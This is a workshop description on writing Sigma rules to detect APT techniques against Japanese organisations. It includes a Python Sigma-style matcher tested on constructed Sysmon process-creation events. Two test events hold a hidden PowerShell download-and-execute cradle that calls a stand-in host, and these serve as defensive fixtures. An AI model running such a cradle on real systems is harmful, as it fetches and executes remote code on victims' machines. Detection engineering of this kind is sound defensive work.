Detection engineering with Sigma: Defend against APT targeting Japan
In this workshop, participants will learn how to detect APT attacks, using cases reported in the past year in which Japanese companies and organizations were targeted. Participants will not try to detect the "less painful" indicators at the bottom of the Pyramid of Pain, such as file hashes and communication destinations, which are the most commonly shared IoCs but are trivial for an attacker to change. Instead, they will focus on higher-level TTPs, which are much harder for attackers to modify.
Each participant will write their own Sigma rules to detect the TTPs used by each actor. No prior experience is required: we will explain how to write rules and how to use the minimum set of tools needed during the workshop. Participants with experience in writing detection logic for EDR products or in malware analysis can take on more advanced tasks.
In the exercise, participants will iterate on their rules against prepared logs, checking whether each rule detects the attack without false positives or false negatives. Model-answer rules, and the reasoning behind them, will be explained afterwards. The rules will be applied to event logs collected with Sysmon. Because Sigma is a vendor-neutral rule format, the same rules can be converted into queries for a wide range of SIEM and EDR products, so we hope each participant can also use them in their own organization's environment after the workshop.
Through this workshop, participants will learn how to use Sigma in security monitoring and incident response, and what analysts should focus on when investigating an intrusion.
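To make the rule-writing loop described above concrete, here is an added example (not part of the workshop material and not the official Sigma tooling): a deliberately small Sigma-style matcher in Python that evaluates a rule, written as a dict mirroring Sigma YAML, against constructed Sysmon Event ID 1 (process creation) records. The rule (an Office application spawning a script host), the internal-tool filter and every event are constructed for illustration only and are not taken from the workshop's cases; for real conversions use sigma-cli / pySigma.

```python
"""Minimal Sigma-style matcher for Sysmon process-creation events (added example).

Implements only the core Sigma semantics needed to exercise a rule offline:
case-insensitive comparison, list = OR, map = AND, list of maps = OR, the
contains/startswith/endswith/all modifiers, and a condition with and/or/not
and parentheses. Wildcards, regex, "1 of them" and backends are out of scope.
"""
import re

# Rule as a dict mirroring Sigma YAML. The TTP (Office app spawning a script
# host) is a generic, well-known pattern, not one of the workshop's cases.
# Matching OriginalFileName (from the PE version resource) as an alternative
# to Image keeps this a TTP detection: renaming powershell.exe on disk does
# not evade it.
RULE = {
    "title": "Office Application Spawning Script Host",
    "logsource": {"product": "windows", "category": "process_creation"},
    "detection": {
        "selection_parent": {
            "ParentImage|endswith": ["\\winword.exe", "\\excel.exe", "\\powerpnt.exe"],
        },
        "selection_child": [  # list of maps -> OR between the maps
            {"Image|endswith": ["\\powershell.exe", "\\cmd.exe", "\\wscript.exe", "\\mshta.exe"]},
            {"OriginalFileName": ["PowerShell.EXE", "Cmd.Exe", "wscript.exe", "MSHTA.EXE"]},
        ],
        # Constructed false-positive tuning: an assumed internal reporting
        # macro that legitimately runs a batch file from Excel.
        "filter_known_tool": {"CommandLine|endswith": "\\Corp\\Reports\\export.bat"},
        "condition": "selection_parent and selection_child and not filter_known_tool",
    },
}

# Constructed Sysmon Event ID 1 records; field names follow the Sysmon schema.
OFFICE = r"C:\Program Files\Microsoft Office\root\Office16"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
EVENTS = [
    {"id": "malicious-macro", "ParentImage": OFFICE + r"\WINWORD.EXE", "Image": PS,
     "OriginalFileName": "PowerShell.EXE",
     "CommandLine": "powershell.exe -nop -w hidden -c \"IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s')\""},
    {"id": "renamed-powershell", "ParentImage": OFFICE + r"\WINWORD.EXE",
     "Image": r"C:\Users\Public\upd.exe", "OriginalFileName": "PowerShell.EXE",  # copied binary
     "CommandLine": "upd.exe -nop -w hidden -c \"IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s')\""},
    {"id": "benign-print", "ParentImage": OFFICE + r"\WINWORD.EXE",  # 32->64-bit print proxy
     "Image": r"C:\Windows\splwow64.exe", "OriginalFileName": "splwow64.exe",
     "CommandLine": r"C:\Windows\splwow64.exe 12288"},
    {"id": "tuned-out-internal-tool", "ParentImage": OFFICE + r"\EXCEL.EXE",
     "Image": r"C:\Windows\System32\cmd.exe", "OriginalFileName": "Cmd.Exe",
     "CommandLine": r"cmd.exe /c C:\Corp\Reports\export.bat"},
    {"id": "admin-shell", "ParentImage": r"C:\Windows\explorer.exe", "Image": PS,  # not the TTP
     "OriginalFileName": "PowerShell.EXE", "CommandLine": "powershell.exe"},
]


def _match_value(event_value, pattern, modifiers):
    """Compare one event field value with one pattern, case-insensitively."""
    if event_value is None:
        return False
    ev, pat = str(event_value).lower(), str(pattern).lower()
    if "contains" in modifiers:
        return pat in ev
    if "startswith" in modifiers:
        return ev.startswith(pat)
    if "endswith" in modifiers:
        return ev.endswith(pat)
    return ev == pat


def _match_field(event, key, patterns):
    """'Field|mod1|mod2': value-or-list. A list is OR unless the |all modifier is set."""
    field, *modifiers = key.split("|")
    patterns = patterns if isinstance(patterns, list) else [patterns]
    hits = [_match_value(event.get(field), p, modifiers) for p in patterns]
    return all(hits) if "all" in modifiers else any(hits)


def _match_selection(event, selection):
    """A map ANDs its fields; a list of maps ORs the maps."""
    if isinstance(selection, list):
        return any(_match_selection(event, s) for s in selection)
    return all(_match_field(event, k, v) for k, v in selection.items())


def _eval_condition(condition, truth):
    """Recursive-descent evaluation of 'a and not (b or c)' over selection results."""
    tokens = re.findall(r"\(|\)|\w+", condition)
    pos = [0]

    def peek():
        return tokens[pos[0]] if pos[0] < len(tokens) else None

    def take():
        pos[0] += 1
        return tokens[pos[0] - 1]

    def atom():
        tok = take()
        if tok == "(":
            value = or_expr()
            take()  # closing parenthesis
            return value
        if tok == "not":
            return not atom()
        return truth[tok]

    def and_expr():
        value = atom()
        while peek() == "and":
            take()
            rhs = atom()
            value = value and rhs
        return value

    def or_expr():
        value = and_expr()
        while peek() == "or":
            take()
            rhs = and_expr()
            value = value or rhs
        return value

    return or_expr()


def evaluate(rule, event):
    """True if the event satisfies the rule's condition."""
    detection = rule["detection"]
    truth = {name: _match_selection(event, sel)
             for name, sel in detection.items() if name != "condition"}
    return _eval_condition(detection["condition"], truth)


def run(rule, events):
    """Return the ids of the events the rule fires on, in log order."""
    return [e["id"] for e in events if evaluate(rule, e)]


if __name__ == "__main__":
    print(RULE["title"], "->", run(RULE, EVENTS))
```

Running it fires on `malicious-macro` and `renamed-powershell` only: the renamed copy is caught through `OriginalFileName`, the print spooler child and the Explorer-launched shell never match the selections, and the constructed internal tool is removed by the `not filter_known_tool` clause. This is the loop the exercise drives: add an event that should or should not fire, re-run, and adjust the selections or filters rather than the rule's indicators.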
- A Windows PC that can be connected to the Internet
Participants are required to install the following tools in advance:
The following experience is not required but is helpful:
- Incident response and malware analysis
- Creating rules for EDR products and Sigma rules